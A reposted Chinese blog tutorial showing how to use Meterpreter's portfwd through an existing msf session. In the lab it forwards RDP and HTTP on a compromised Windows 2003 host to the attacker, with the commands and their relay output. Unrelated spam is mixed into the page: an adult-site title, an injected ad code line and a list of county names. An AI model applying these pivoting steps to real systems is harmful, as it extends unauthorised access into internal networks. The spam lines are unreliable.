91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

基于Portfwd端口轉發

發布時間:2020-08-07 19:20:14 來源:ITPUB博客 閱讀:228 作者:專注的阿熊 欄目:數據庫

Portfwd是一款強大的端口轉發工具,支持TCP,UDP,支持IPV4--IPV6的轉換轉發。 并且內置于meterpreter。 其中exe單版本源碼如下:

https://github.com/rssnsj/portfwd

復現過程

攻擊機: 192.168.1.5                     Debian(Kali)

靶   機: 192.168.1.4                  Windows7

192.168.1.119        Windows 2003


Sessions -l查看所有msf的連接,看到一條連接到windows 03通信,是從192.168.1.1:455303到192.168.1.119:53

基于Portfwd端口轉發

session -l  查看會話

基于Portfwd端口轉發

靶機IP為:192.168.1.119---windows 2003---x64

function(){   //外匯跟單www.gendan5.com

需要轉發端口為:80,3389

選擇連接中的1號,就一條所以就只能選這個了

基于Portfwd端口轉發

續上圖

基于Portfwd端口轉發

基于Portfwd端口轉發

  Portfwd -h查看用法

基于Portfwd端口轉發

基于Portfwd端口轉發

 攻擊執行

1   meterpreter   >   portfwd   add   l   33389   r   192.168.1.119   p 3389

2   [ * ]   Local   TCP   relay created: : 33389   <‐> 192.168.1.119 : 3389

3   meterpreter   >   portfwd   add   l   30080   r   192.168.1.119   p 80

4   [ * ]   Local   TCP   relay created: : 30080   <‐> 192.168.1.119 : 80

5   meterpreter >   portfwd

Index Local   RemoteDirection

1 0.0.0.0 : 33389 192.168.1.119 : 3389   Forward

2 0.0.0.0 : 30080 192.168.1.119 : 80   Forward

2   total active port forwards .

成功

基于Portfwd端口轉發


向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

肃宁县| 扶沟县| 寻乌县| 秭归县| 巫溪县| 漠河县| 白河县| 墨脱县| 德兴市| 晋州市| 株洲市| 阿拉善右旗| 攀枝花市| 耒阳市| 宽甸| 长泰县| 黄冈市| 慈利县| 潞城市| 五大连池市| 桓仁| 高雄县| 塔河县| 上栗县| 资中县| 兴安县| 松溪县| 苏尼特左旗| 黑山县| 晋州市| 大渡口区| 宜宾县| 五大连池市| 保康县| 行唐县| 田东县| 赣榆县| 甘孜县| 五台县| 栾川县| 海晏县|